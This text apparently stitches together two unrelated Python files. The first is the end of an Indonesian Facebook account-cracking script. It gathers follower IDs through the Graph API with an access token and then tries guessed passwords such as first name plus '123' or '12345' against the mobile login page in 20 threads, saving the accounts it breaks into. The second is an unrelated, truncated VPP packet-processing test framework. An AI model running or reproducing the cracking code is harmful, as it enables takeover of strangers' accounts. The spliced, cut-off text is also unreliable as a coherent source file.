print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pc4
oke = open('done/like.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pc4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;91m[Cekpoint]\033[0;97m '+em+' \033[0;91m∆\033[0;97m '+pc4
cek = open('done/like.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pc4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;91mSelesai ...'
print"\033[0;91m• \033[0;91mTotal \033[0;92mOK\033[0;97m/\x1b[0;91mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;91m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;91mCP \033[0;91mfile tersimpan \033[0;91m: \033[0;92mdone/like.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;91mKembali\033[0;97m >")
os.system("python2 crack-2.py")
##### CRACK FOLLOW #####
def crack_follow():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;93m1.\033[0;97m Crack Dari Follower Saya');time.sleep(0.07)
print ('\033[0;93m2.\033[0;97m Crack Dari Follower Teman');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_follow()
#### PILIH FOLLOW ####
def pilih_follow():
keak = raw_input('\033[0;93m>\033[0;97m ')
if keak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_follow()
elif keak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/subscribers?limit=999999&access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif keak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;93mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;93m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;93mKembali \033[0;97m>")
crack_follow()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=999999&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif keak =="0":
menu()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_follow()
print '\033[0;91m• \033[0;93mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;93mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;93mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;93mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN FOLLOW ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
pr = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pr, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pr
oke = open('done/follow.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pr)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;93m[Cekpoint]\033[0;97m '+em+' \033[0;93m∆\033[0;97m '+pr
cek = open('done/follow.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pr)
cek.close()
cekpoint.append(em)
else:
pr2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pr2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pr2
oke = open('done/follow.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pr2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;93m[Cekpoint]\033[0;97m '+em+' \033[0;93m∆\033[0;97m '+pr2
cek = open('done/follow.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pr2)
cek.close()
cekpoint.append(em)
else:
pr3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pr3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pr3
oke = open('done/follow.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pr3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;93m[Cekpoint]\033[0;97m '+em+' \033[0;93m∆\033[0;97m '+pr3
cek = open('done/follow.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pr3)
cek.close()
cekpoint.append(em)
else:
pr4 = v['first_name']+'321'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pr4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pr4
oke = open('done/follow.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pr4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;93m[Cekpoint]\033[0;97m '+em+' \033[0;93m∆\033[0;97m '+pr4
cek = open('done/follow.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pr4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;93mSelesai ...'
print"\033[0;91m• \033[0;93mTotal \033[0;92mOK\033[0;97m/\x1b[0;93mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;93m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;93mCP \033[0;93mfile tersimpan \033[0;91m: \033[0;92mdone/follow.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;93mKembali\033[0;97m >")
os.system("python2 crack-2.py")
#### CARI ID ####
def cari_id():
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
ling = ('https://www.facebook.com/')
url = ling+raw_input("\033[0;91m• \033[0;93mUsername \033[0;91m:\033[0;92m ")
idre = re.compile('"entity_id":"([0-9]+)"')
page = requests.get(url)
nex = idre.findall(page.content)
for hasil in nex:
print '\n'+'\033[0;91m• \033[0;93mID Anda\033[0;91m :\033[0;92m '+hasil
raw_input("\n\033[0;97m< \033[0;92mKembali \033[0;97m>")
menu()
### HASIL CRACK ###
def hasil_crack():
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;92m1. \033[0;97mLihat Hasil Crack Indonesia');time.sleep(0.07)
print ('\033[0;92m2. \033[0;97mLihat Hasil Crack Bangladesh');time.sleep(0.07)
print ('\033[0;92m3. \033[0;97mLihat Hasil Crack Pakistan');time.sleep(0.07)
print ('\033[0;92m4. \033[0;97mLihat Hasil Crack Usa');time.sleep(0.07)
print ('\033[0;92m5. \033[0;97mLihat Hasil Crack Like');time.sleep(0.07)
print ('\033[0;92m6. \033[0;97mLihat Hasil Crack Follow');time.sleep(0.07)
print ('\033[0;91m0. \033[0;97mKembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_hasil()
### PILIH HASIL ###
def pilih_hasil():
keak = raw_input('\033[0;92m>\033[0;97m ')
if keak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_hasil()
elif keak =="1":
os.system('xdg-open done/indo.txt')
hasil_crack()
elif keak =="2":
os.system('xdg-open done/bangla.txt')
hasil_crack()
elif keak =="3":
os.system('xdg-open done/bangla.txt')
hasil_crack()
elif keak =="4":
os.system('xdg-open done/pakis.txt')
hasil_crack()
elif keak =="5":
os.system('xdg-open done/usa.txt')
hasil_crack()
elif keak =="6":
os.system('xdg-open done/like.txt')
hasil_crack()
elif keak =="7":
os.system('xdg-open done/follow.txt')
hasil_crack()
elif keak =="0":
menu()
else:
print '\033[0;91mIsi Yg Benar'
### PERBARUI SCRIPT ###
def perbarui():
os.system("clear")
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
jalan ("\033[0;92mMemperbarui Script ...\033[0;93m")
os.system("git pull origin master")
raw_input("\n\033[0;97m<\033[0;92m Kembali \033[0;97m>")
os.system("python2 crack-2.py")
if __name__=='__main__':
menu()
masuk()
|
framework.py | #!/usr/bin/env python3
from __future__ import print_function
import gc
import sys
import os
import select
import signal
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_shmem import VppTransportShmemIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
if os.name == 'posix' and sys.version_info[0] < 3:
# using subprocess32 is recommended by python official documentation
# @ https://docs.python.org/2/library/subprocess.html
import subprocess32 as subprocess
else:
import subprocess
# Python2/3 compatible
try:
input = raw_input
except NameError:
pass
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
class BoolEnvironmentVariable(object):
def __init__(self, env_var_name, default='n', true_values=None):
self.name = env_var_name
self.default = default
self.true_values = true_values if true_values is not None else \
("y", "yes", "1")
def __bool__(self):
return os.getenv(self.name, self.default).lower() in self.true_values
if sys.version_info[0] == 2:
__nonzero__ = __bool__
def __repr__(self):
return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
(self.name, self.default, self.true_values)
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = 'running %s.%s ' % (testcase, method_name)
msg = "VPP subprocess died %sunexpectedly with return code: %d%s." % (
in_msg,
self.rv,
' [%s]' % (self.signal_name if
self.signal_name is not None else ''))
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.debug(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.debug(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
return BoolEnvironmentVariable('SKIP_AARCH64')
is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
return BoolEnvironmentVariable("EXTENDED_TESTS")
running_extended_tests = _running_extended_tests()
def _running_on_centos():
os_id = os.getenv("OS_ID", "")
return True if "centos" in os_id.lower() else False
running_on_centos = _running_on_centos()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@staticmethod
def get_least_used_cpu():
cpu_usage_list = [set(range(psutil.cpu_count()))]
vpp_processes = [p for p in psutil.process_iter(attrs=['pid', 'name'])
if 'vpp_main' == p.info['name']]
for vpp_process in vpp_processes:
for cpu_usage_set in cpu_usage_list:
try:
cpu_num = vpp_process.cpu_num()
if cpu_num in cpu_usage_set:
cpu_usage_set_index = cpu_usage_list.index(
cpu_usage_set)
if cpu_usage_set_index == len(cpu_usage_list) - 1:
cpu_usage_list.append({cpu_num})
else:
cpu_usage_list[cpu_usage_set_index + 1].add(
cpu_num)
cpu_usage_set.remove(cpu_num)
break
except psutil.NoSuchProcess:
pass
for cpu_usage_set in cpu_usage_list:
if len(cpu_usage_set) > 0:
min_usage_set = cpu_usage_set
break
return random.choice(tuple(min_usage_set))
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = BoolEnvironmentVariable('STEP')
d = os.getenv("DEBUG", None)
# inverted case to handle '' == True
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.set_debug_flags(d)
cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
cpu_core_number = cls.get_least_used_cpu()
if not hasattr(cls, "worker_config"):
cls.worker_config = ""
cls.vpp_cmdline = [cls.vpp_bin, "unix",
"{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}", "api-segment", "{",
"prefix", cls.shm_prefix, "}", "cpu", "{",
"main-core", str(cpu_core_number),
cls.worker_config, "}",
"statseg", "{", "socket-name", cls.stats_sock, "}",
"socksvr", "{", "socket-name", cls.api_sock, "}",
"plugins",
"{", "plugin", "dpdk_plugin.so", "{", "disable",
"}", "plugin", "rdma_plugin.so", "{", "disable",
"}", "plugin", "unittest_plugin.so", "{", "enable",
"}"] + cls.extra_vpp_plugin_config + ["}", ]
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
if cls.test_plugin_path is not None:
cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print("sudo gdb " + cls.vpp_bin +
" -ex 'target remote localhost:{port}'"
.format(port=cls.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or \
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_stats_socket(cls):
deadline = time.time() + 300
ok = False
while time.time() < deadline or \
cls.debug_gdb or cls.debug_gdbserver:
if os.path.exists(cls.stats_sock):
ok = True
break
cls.sleep(0.8)
if not ok:
cls.logger.critical("Couldn't stat : {}".format(cls.stats_sock))
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
gc.collect() # run garbage collection first
cls.logger = get_logger(cls.__name__)
seed = os.environ["RND_SEED"]
random.seed(seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
cls.tempdir = tempfile.mkdtemp(
prefix='vpp-unittest-%s-' % cls.__name__)
cls.stats_sock = "%s/stats.sock" % cls.tempdir
cls.api_sock = "%s/api.sock" % cls.tempdir
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" %
cls.__name__)
cls.shm_prefix = os.path.basename(cls.tempdir)
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, shm prefix is %s",
cls.tempdir, cls.shm_prefix)
cls.logger.debug("Random seed is %s" % seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._captures = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver:
read_timeout = 0
else:
read_timeout = 5
cls.vapi = VppPapiProvider(cls.shm_prefix, cls.shm_prefix, cls,
read_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.wait_for_stats_socket()
cls.statistics = VPPStats(socketname=cls.stats_sock)
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except Exception:
try:
cls.vapi.disconnect()
except Exception:
pass
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
if (cls.debug_gdbserver or cls.debug_gdb) and hasattr(cls, 'vpp'):
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stdderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
vpp_api_trace_log))
except VppTransportShmemIOError:
self.logger.debug("VppTransportShmemIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
